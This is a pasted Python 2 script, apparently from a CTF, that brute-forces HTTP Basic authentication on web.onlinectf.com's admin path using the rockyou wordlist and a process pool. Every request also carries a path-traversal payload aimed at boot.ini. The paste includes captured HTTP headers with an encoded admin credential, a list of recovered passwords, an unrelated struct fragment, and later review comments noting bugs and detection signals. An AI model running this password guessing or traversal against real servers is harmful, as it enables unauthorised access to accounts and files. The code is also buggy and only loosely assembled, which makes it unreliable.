Ikuzo

Untitled

Sep 30th, 2017
  1. #! /usr/bin/env python
  2.  
  3. """
  4. POST /johnny/admin/ HTTP/1.1
  5. Host: web.onlinectf.com
  6. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  8. Accept-Language: en-US,en;q=0.5
  9. Accept-Encoding: gzip, deflate
  10. Referer: http://web.onlinectf.com/johnny/
  11. DNT: 1
  12. Authorization: Basic YWRtaW46YWNhc2E=
  13. Connection: keep-alive
  14. Upgrade-Insecure-Requests: 1
  15. """
  16.  
  17.  
  18. """
  19. HTTP/1.1 401 Unauthorized
  20. Date: Sat, 16 Sep 2017 22:28:33 GMT
  21. Content-Type: text/html; charset=iso-8859-1
  22. Transfer-Encoding: chunked
  23. Connection: keep-alive
  24. Set-Cookie: __cfduid=d411d098596d463eb43b24caa6291ed571505600913; expires=Sun, 16-Sep-18 22:28:33 GMT; path=/; domain=.onlinectf.com; HttpOnly
  25. x-frame-options: SAMEORIGIN
  26. WWW-Authenticate: Basic realm="Restricted Area"
  27. Server: cloudflare-nginx
  28. CF-RAY: 39f7426c72b52926-OTP
  29. """
  30. '''
  31. HTTP/1.1 500 Internal Server Error
  32. Date: Sun, 17 Sep 2017 06:14:32 GMT
  33. Content-Type: text/html; charset=iso-8859-1
  34. Transfer-Encoding: chunked
  35. Connection: keep-alive
  36. Set-Cookie: __cfduid=d983b9f19a48f57d534489ada8b8fdf9e1505628871; expires=Mon, 17-Sep-18 06:14:31 GMT; path=/; domain=.onlinectf.com; HttpOnly
  37. x-frame-options: SAMEORIGIN
  38. Server: cloudflare-nginx
  39. CF-RAY: 39f9ed017391290e-OTP
  40. '''
  41. '''
  42. _fields_ = [
  43. ("magic", c_char * 4),
  44. ("payload_size", c_uint32),
  45. ("header_md5", c_ubyte * 8),
  46. ("etl", c_uint8 * 7), # always zero
  47. ("unused_1", c_char),
  48. ("password_len", c_uint16),
  49. ("padding_len", c_uint16),
  50. ("unused_2", c_ubyte * 4),
  51. ("plaintext_md5", c_ubyte * 16)
  52. ]
  53.  
  54. names = [
  55. "magic",
  56. "payload_size",
  57. "header_md5",
  58. "etl",
  59. "unused_1",
  60. "password_len",
  61. "padding_len",
  62. "unused_2",
  63. "plaintext_md5"
  64. ]
  65. '''
  66.  
  67. from http.client import *
  68. from base64 import b64encode
  69. import multiprocessing as mp
  70. import optparse
  71.  
  72. # Module-level defaults (account name, wordlist path); main() assigns its own local copies of both names.
  73. # OpenConnection() resolves `username` to the value set here.
  74. username = "admin"
  75. pfile = "/usr/share/wordlists/rockyou.txt"
  76.  
  77. def main():  # Entry point: parse -u/-p, then hand every line of the wordlist to OpenConnection through a process pool.
  78. parser = optparse.OptionParser("usage%prog" +\
  79. "-u <username> -p <password_list>")
  80. parser.add_option( "-u", dest="uname", type="string", \
  81. help="specify username")
  82. parser.add_option( "-p", dest="plist", type="string", \
  83. help="specify password list")
  84. (options, args) = parser.parse_args()
  85. if (options.uname == None) | (options.plist == None):  # bitwise | on two comparison results: true when either option is missing
  86. print parser.usage
  87. username = "admin"  # no `global` statement in this function, so this binds a name local to main()
  88. pfile = "/usr/share/wordlists/rockyou.txt"
  89. else:
  90. username = options.uname  # NOTE(review): local as well, while OpenConnection reads the module-level `username` - confirm
  91. pfile = options.plist
  92.  
  93. print "[+] BF for username : {0}".format(username)
  94. print "[+] Chosen pw list : {0}".format(pfile)
  95.  
  96.  
  97. N_CPU = 3  # worker-process count passed to mp.Pool below
  98. N = 64  # not referenced again inside main()
  99. pool = mp.Pool(N_CPU)  # requests go out in parallel with no delay between attempts; server-side, lockout and per-source rate limits on failed logins are the controls aimed at this pattern
  100.  
  101. print "Multi Starting"
  102. with open(pfile) as passfile:
  103. pool.imap_unordered(OpenConnection, (password for password in passfile))  # one task per wordlist line; the returned iterator is discarded, so worker return values are never read
  104. pool.close()  # NOTE(review): indentation was lost in this paste, so whether close()/join() sit inside the `with` cannot be told from here
  105. pool.join()  # blocks until the worker processes exit
  106.  
  107. def OpenConnection(passwd):
  108. '''
  109. Worker: send one POST carrying an HTTP Basic Authorization header built from the module-level username and passwd.
  110. A response status other than 500 is printed as a hit, together with the password and the encoded header.
  111. The connection is plain HTTP on port 80, so the Basic credentials travel base64-encoded, not encrypted.
  112. '''
  113. print "[*] Trying {0}".format(passwd)
  114. conection1 = HTTPConnection("web.onlinectf.com", 80)  # a new connection per candidate; no close() call appears in this function
  115.  
  116. passwd = passwd.rstrip()  # drop the trailing newline left by reading the wordlist line by line
  117. #create username:password b64 encode string for HTTP header
  118. userpass = bytes(username + ':' + passwd)  # `username` is neither a parameter nor a local here, so it resolves to the module-level name
  119. string_userpass = b64encode(userpass).decode('iso-8859-1')  # base64 is an encoding: anyone who sees the header recovers the password
  120. auth_header = { 'Authorization' : 'Basic %s' % string_userpass}
  121. #print auth_header
  122. #Submitting POST method
  123. conection1.request('POST', '/johnny/admin/logging/logviewer.jsp?logfile=../../../../../../../boot.ini', headers=auth_header)  # server-side, every attempt is a POST to one path with a changing Authorization header and a `../` run in `logfile`; both are loggable detection signals
  124. response = conection1.getresponse()
  125. print response.getheaders()
  126. print "--------------------------"
  127. #print response.status
  128. if response.status != 500:  # NOTE(review): a 401 such as the one captured in the notes at the top of this file also passes this test - confirm which status a rejected login returns on this path
  129. print "[-------------------------------------------]"
  130. print "[+] Status: {0} for pws: {1}".format(response.status, passwd)
  131. print "[+] Auth header: {0}".format(string_userpass)  # writes the credential to stdout, so any captured output or log contains it
  132. print "[-------------------------------------------]"
  133. return 0
  134.  
  135.  
  136. # callback running only in __main__
  137.  
  138. def quit(arg):  # Callback: print arg, then terminate the pool. No call to it appears in this listing.
  139. print "quitting with %g" % arg
  140. # NOTE(review): the original note spoke of `p` being global in __main__, but the call below uses `pool`, which this listing only assigns inside main() - no module-level `pool` is visible here
  141. pool.terminate() # kill all pool workers
  142.  
  143. if __name__ == '__main__':  # run main() only when the file is executed as a script
  144. main()
  145. #OpenConnection("#1HOGETTE")
  146. #OpenConnection("#1HOLDEN")
  147. #OpenConnection("#1HOGFAN")
  148. #OpenConnection("$$$ODIE")
  149. #OpenConnection("$$$money")
  150. #OpenConnection("$GETMONEY")
  151.  
  152. '''
  153. pws found:
  154. [+] Password found: #1HOGETTE
  155. [+] Password found: #1HOLDEN
  156. [+] Password found: #1HOGFAN
  157. [+] Password found: $$$ODIE
  158. [+] Password found: $$$money
  159. [+] Password found: $GETMONEY
  160.  
  161.  
  162. '''